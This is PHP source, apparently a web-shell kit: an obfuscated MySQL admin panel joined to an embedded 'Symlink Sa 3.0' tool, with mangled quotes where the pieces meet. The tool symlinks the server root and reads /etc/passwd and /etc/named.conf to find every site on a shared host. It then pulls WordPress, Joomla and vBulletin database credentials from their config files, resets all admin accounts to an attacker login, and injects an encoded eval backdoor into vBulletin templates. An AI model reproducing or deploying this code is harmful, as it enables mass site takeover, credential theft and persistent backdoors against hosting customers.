			if (!$firstfield)
			{
				$tabledump .= ', ';
			}
			else
			{
				$firstfield = 0;
			}

			if (!isset($row["$fieldcounter"]))
			{
				$tabledump .= 'NULL';
			}
			else
			{
				$tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
			}
		}

		$tabledump .= ");\n";

		echo $tabledump;

	}
	@mysql_free_result($rows);
}

function dump() {
	global $mysqlHandle, $action, $dbname, $tablename;

	if( $action == "dumpTable" ){

		header("Content-disposition: filename=$tablename.sql");
		header('Content-type: unknown/unknown');
		fetch_table_dump_sql($tablename);
		echo "\n\n\n";
		echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
		exit;

	}else{
		header("Content-disposition: filename=$dbname.sql");
		header('Content-type: unknown/unknown');

		mysql_select_db( $dbname, $mysqlHandle );
		$query_id = mysql_query("SHOW tables",$mysqlHandle);
		while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
		{
				fetch_table_dump_sql($row[0]);
				echo "\n\n\n";
				echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
				echo "\n\n\n";
		}
		echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
		exit;

	}

}

function utils() {
	global $PHP_SELF, $command;
	echo "<h1>Utilities</h1>\n";
	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
		echo "<hr>\n";
		echo "Show\n";
		echo "<ul>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
		echo "</ul>\n";
		echo "Flush\n";
		echo "<ul>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
		if( $command == "flush_hosts" ) {
			if( mysql_query( "Flush hosts" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
		if( $command == "flush_logs" ) {
			if( mysql_query( "Flush logs" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
		if( $command == "flush_privileges" ) {
			if( mysql_query( "Flush privileges" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
		if( $command == "flush_tables" ) {
			if( mysql_query( "Flush tables" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
		if( $command == "flush_status" ) {
			if( mysql_query( "Flush status" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "</ul>\n";
	} else {
		$queryStr = ereg_replace( "_", " ", $command );
		$pResult = mysql_query( $queryStr );
		if( $pResult == false ) {
			echo "Fail";
			return;
		}
		$col = mysql_num_fields( $pResult );

		echo "<p class=location>$queryStr</p>\n";
		echo "<hr>\n";

		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
		echo "<tr>\n";
		for( $i = 0; $i < $col; $i++ ) {
			$field = mysql_fetch_field( $pResult, $i );
			echo "<th>".$field->name."</th>\n";
		}
		echo "</tr>\n";

		while( 1 ) {
			$rowArray = mysql_fetch_row( $pResult );
			if( $rowArray == false ) break;
			echo "<tr>\n";
			for( $j = 0; $j < $col; $j++ )
				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
			echo "</tr>\n";
		}
		echo "</table>\n";
	}
}



function footer_html() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

	echo "<hr>\n";
	echo "[$USERNAME] - \n";

	echo "<a href='$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \n";
	if( $tablename != "" )
		echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";


}




//------------- MAIN ------------- //
error_reporting(0);
ini_set ('display_errors', 0);
ini_set ('log_errors', 0);

if( $action == "logon" || $action == "" || $action == "logout" )
	logon();
else if( $action == "bG9nb25fc3VibWl0" )
	logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
		if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
	}
	$mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
	dump();
} else {
	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
		if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
	}
	echo "<!--";
	$mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
	echo "-->";

	if( $mysqlHandle == false ) {


		echo "<table width=100% height=100%><tr><td><center>\n";
		echo "<h1>Wrong Password!</h1>\n";
		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
		echo "</center></td></tr></table>\n";

	} else {

		if( $action == "bGlzdERCcw==" )
			listDatabases();
		else if( $action == "createDB" )
			createDatabase();
		else if( $action == "dropDB" )
			dropDatabase();
		else if( $action == "listTables" )
			listTables();
		else if( $action == "createTable" )
			createTable();
		else if( $action == "dropTable" )
			dropTable();
		else if( $action == "viewSchema" )
			viewSchema();
		else if( $action == "query" )
			viewData( $queryStr );
		else if( $action == "addField" )
			manageField( "add" );
		else if( $action == "addField_submit" )
			manageField_submit( "add" );
		else if( $action == "editField" )
			manageField( "edit" );
		else if( $action == "editField_submit" )
			manageField_submit( "edit" );
		else if( $action == "dropField" )
			dropField();
		else if( $action == "dmlld0RhdGE=" )
			viewData( "" );
		else if( $action == "addData" )
			manageData( "add" );
		else if( $action == "addData_submit" )
			manageData_submit( "add" );
		else if( $action == "editData" )
			manageData( "edit" );
		else if( $action == "editData_submit" )
			manageData_submit( "edit" );
		else if( $action == "deleteData" )
			deleteData();
		else if( $action == "utils" )
			utils();

		mysql_close( $mysqlHandle);
		footer_html();
	}
}


?>
<html>
<head>
<title>MySQL Interface (Developed By Mohajer22)</title>
<body bgColor=#202040 >
<style type="text/css">
<!--
p.location {
	color: #11bb33;
	font-size: small;
}
h1 {
	color: #c00000;
}
th {
	background-color: #000000;
	color: #11bb33;
	font-size: small;
}
td {
	background-color: #808080;
	font-size: small;
}
form {
	margin-top: 0;
	margin-bottom: 0;
}
a {
	text-decoration:none;
	color: #848200;
	font-size:small;
}
A:link {
COLOR:#EEEFD5;
TEXT-DECORATION: none
}
A:visited {
COLOR:#c00000;
TEXT-DECORATION: none
}
A:active {
COLOR:#c00000;
TEXT-DECORATION: none
}
A:hover {
color:#c00000;
TEXT-DECORATION: none
}
input, select, textarea {
background-color: #404040;
border-style: solid;
font-family: verdana, arial, sans-serif;
font-size:small;
color: #000000;
padding: 0px;
}
//-->
</style>
</head>‘;
$file = fopen("sql.php" ,"w+");
$write = fwrite ($file ,base64_decode($crackftp));
fclose($file);
echo "<iframe src=damane/sql.php width=100% height=100% frameborder=0></iframe> ";
}
elseif ($action == ’sym1′) {
@chdir(‚damane‘);
$symlinker = ‚<?php

set_time_limit(0);
error_reporting(0);


$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );

?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Symlink_Sa 3.0</title>

<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}
a{

 font-size: 13px;

}


body {
    direction: ltr;
    background-color:#F4F4F4;
	color: rgb(153, 153, 153);
    text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;


}

.cont a{

 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
  font-size: 13px;
}

.tmp tr td a {
  text-decoration: none;



}

.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
  color: #FF0000;
}



</style>

</head>

<body>

<div class='all'>


<?php

@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);



@symlink("/","sym/root");

$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{

/// Domains + Scripts  ///

case 'sec':

if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){

@preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

 ////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
  $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
}

elseif (strpos($wh13, "200")  == true)
{
  $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";

}

///////// Joomla to 4 ///////////

elseif (strpos($jo, "200")  == true)
{
  $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
}

elseif (strpos($jo12, "200")  == true)
{
  $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
}

//////////vBulletin to 4 ///////////

elseif (strpos($vb, "200")  == true)
{
  $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb12, "200")  == true)
{
  $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
}

elseif (strpos($vb13, "200")  == true)
{
  $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
}

else
{
 continue;
}
flush();
flush();

/////////////////////////////////////////////////////////////////////////////////////

$site = $user['name'] ;



flush();

echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
<td>".$config."</td></tr>"; flush();

}
}
}
}

break;


/// user + domine + symlink  ///

case 'sym':

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

flush();



$site = $user['name'] ;


@symlink("/","sym/root");

$site = $domsws[1][0];

$ir = 'ir';

$il = 'il';

if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
{
$site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
}


echo "
<tr>

<td>
<div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
</td>


<td>
".$user['name']."
</td>
<td>
<a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
</td>


</tr></div> ";


flush();
flush();

}
}
}
}




break;


/// file  symlink ///

case 'file':

echo'
The file path to symlink

<br /><br />
<form method="post">
<input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
<input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
<input type="submit" value="symlink" name="symlink" /> <br /><br />



</form>
';

$pfile = $_POST['file'];
$symfile = $_POST['symfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


@mkdir('sym1',0777);
$c  = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n  AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
$f =@fopen ('sym1/.htaccess','w');
@fwrite($f , $c);

@symlink("$pfile","sym1/$symfile");

echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';

}
break;

/// bypass read

case 'read':

echo "read /etc/named.conf";
echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
flush();
flush();


$file = '/etc/named.conf';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
else if (!$r3ad)
{
$r3ad = @show_source($file) ;
}
else if (!$r3ad)
{
$r3ad = @highlight_file($file);
}
else if (!$r3ad)
{
$sm = @symlink($file,'sym.txt');


if ($sm){
$r3ad = @fopen('sym/sym.txt', 'r');
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";

}
}

echo "</textarea><br /><br /><input  type='submit' value='Save'/> </form>";


if(isset($_GET['save'])){


$cont = stripcslashes($_POST['file']);

$f = fopen('named.txt','w');

$w = fwrite($f,$cont);

                  if($w){

                  echo '<br />save has been successfully';

                  }

fclose($f);

}

break;

// passwd

case 'passwd':

if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){


$cont = stripcslashes($_POST['file']);

if(!file_exists('passwd.txt')){

$f = @fopen('passwd.txt','w');

$w = @fwrite($f,$cont);

fclose($f);
}
if($w or @filesize('passwd.txt') > 0){
// * SHOW * //

echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
flush();

$fil3 = file('passwd.txt');

foreach ($fil3 as $f){

     $u=explode(':', $f);
     $user = $u['0'];



echo "
<tr>


<td width='15%'>
$user
</td>

<td width='10%'>
<a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
</td>

<td width='10%'>
<a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
</td>



</tr></div> ";


flush();
flush();


}

die ("</tr></div>");
                  }

}

echo "read /etc/passwd";
echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
flush();

$file = '/etc/passwd';


$r3ad = @fopen($file, 'r');
if ($r3ad){
$content = @fread($r3ad, @filesize($file));
echo "".htmlentities($content)."";
}
elseif(!$r3ad)
{
$r3ad = @show_source($file) ;
}
elseif(!$r3ad)
{
$r3ad = @highlight_file($file);
}
elseif(!$r3ad)
{

                                            for($uid=0;$uid<1000;$uid++){
                                             $ara = posix_getpwuid($uid);
                                               if (!empty($ara)) {
                                                  while (list ($key, $val) = each($ara)){
                                                    print "$val:";
                                                  }
                                                  print "\n";
                                                 }

                                        }

 }


flush();


echo "</textarea><br /><br /><input  type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
flush();

break;



case 'joomla':

/////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////


if(isset($_POST['s'])){

$file = @file_get_contents('joomla.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('JConfig',$readconfig)){



$pass    =  ex($readconfig,'$password = \'',"';");

$userdb  =  ex($readconfig,'$user = \'',"';");

$db      =  ex($readconfig,'$db = \'',"';");

$fix     =  ex($readconfig,'$dbprefix = \'',"';");

$tab     =  $fix.'users';


$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab`  SET `username` ='sec-w.com'");


$query3  = @mysql_query("UPDATE `$tab`  SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");


if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
flush();



}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
flush();

}

}

die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

flush();


}else{

$d00m = file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=joomla'>
<input type='submit' value='Mass ching Admin' />
<input type='hidden' value='1' name='s' />
</form><br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('joomla.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// joomla ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";

flush();

}
}
}
}


break;

case 'wp':

if(isset($_POST['s'])){

$file = @file_get_contents('wp.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
flush();
flush();


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('wp-settings.php',$readconfig)){



$pass    =  ex($readconfig,"define('DB_PASSWORD', '","');");

$userdb  =  ex($readconfig,"define('DB_USER', '","');");

$db      =  ex($readconfig,"define('DB_NAME', '","');");

$fix     =  ex($readconfig,'$table_prefix  = \'',"';");

$tab     = $fix.'users';

$con     = @mysql_connect('localhost',$userdb,$pass);

$db      = @mysql_select_db($db,$con);

$query   = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;

$query   = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;



if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}

else

{

$r = '<b style="color:red">failed</b>';

}

$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";

flush();
flush();

}else{

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";

flush();
flush();

}

}

die();

}

if(!is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=wp'>
<input type='submit' value='Mass Change Admin' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

flush();
flush();

$f = fopen('wp.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// wp ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;

}
flush();

/////////////////////////////////////////////////////////////////////////////////////

$dom = $domsws[1][0];

$w = fwrite($f,"$config||$dom \n");
if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}


echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
<td><a href='$config'>config</a></td><td>".$r."</td></tr>";
flush();
flush();





flush();


}
}
}
}


break;


case 'vb':


if(isset($_POST['s'])){



$file = @file_get_contents('vb.txt');

$ex   = explode("\n",$file);

echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";


foreach ($ex as $exp){

$es   = explode("||",$exp);

$config = $es[0];

$domin = $es[1];

$domins = trim($domin).'';

$readconfig  = @file_get_contents(trim($config));

if(ereg('vBulletin',$readconfig)){

$db      =  ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
$userdb  =  ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
$pass    =  ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
$con     = @mysql_connect('localhost',$userdb,$pass);
$db      = @mysql_select_db($db,$con);
$shell   = "bVDPS8MwFL4L/g+vYZAWdPPiaUv14kAQFKqnUUqapjSYNKFJxCn7322abgzcIfDyvl+P7/qKs04D3tS5sJ96MMJ9b+ohDw8vTWcq31PF02yJp/WqzvEaZk2rBwWUOaF7ghAo7jrdEGS0dQh4z9zecIKUl04YOrhV4N821FEEwZQgb6SmDR8QiObsdxYheuMdRKNWSH5UxtmKn3G+v0P5TIxgNTqhWWR9rYSLAXH/RaUfgY8pbVROZ4VI0aawqN5ei/cdDlRcAiFwJEIGv4HyyLTZp4tq+/zyVOxwOASXO+yUqUI6Lm/gHxiBLDic6o62UHjGuLWQJEko99T9Gg7ApeUXJFsq5EX+AR7yPw==" ;
$crypt  = "{\${eval(gzinflate(base64_decode(\'";
$crypt .= "$shell";
$crypt .= "\')))}}{\${exit()}}</textarea>";
$sqlfaq = "UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
$query  = @mysql_query($sqlfaq,$con);
if ($query){$r = '<b style="color: #006600">Succeed</b> shell in search.php';}
else
{
$r = '<b style="color:red">failed</b>';
}
$domins = trim($domin).'';

echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
}else{
echo "<tr>
<td><a target='_blank' href='http://$domins'>$domin</a></td>
<td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
}
}
die();
}
if(!is_file('named.txt')){
$d00m = file("/etc/named.conf");
}else{
$d00m = file("named.txt");
}
if(!$d00m)
{
die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else
{
echo "<div class='tmp'>
<form method='POST' action='$pg?sws=vb'>
<input type='submit' value='Inject shell' />
<input type='hidden' value='1' name='s' />
</form>
<br /><br />
<table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";

$f = fopen('vb.txt','w');

foreach($d00m as $dom){

if(eregi("zone",$dom)){

preg_match_all('#zone "(.*)"#', $dom, $domsws);

if(strlen(trim($domsws[1][0])) > 2){

$user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/includes/config.php";
$wpp=get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/vb/includes/config.php";
$wpp2=get_headers($wp2);
$wp12=$wpp2[0];

$wp3=$pageURL."/sym/root/home/".$user['name']."/forum/includes/config.php";
$wpp3=get_headers($wp3);
$wp13=$wpp3[0];


 ////////// vb ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config= $wpl;
}
elseif (strpos($wp12, "200") == true)
{
  $config= $wp2;
}
elseif (strpos($wp13, "200") == true)
{
  $config= $wp3;
}
else
{
continue;
}
flush();
/////////////////////////////////////////////////////////////////////////////////////
$dom = $domsws[1][0];
$w = fwrite($f,"$config||$dom \n");
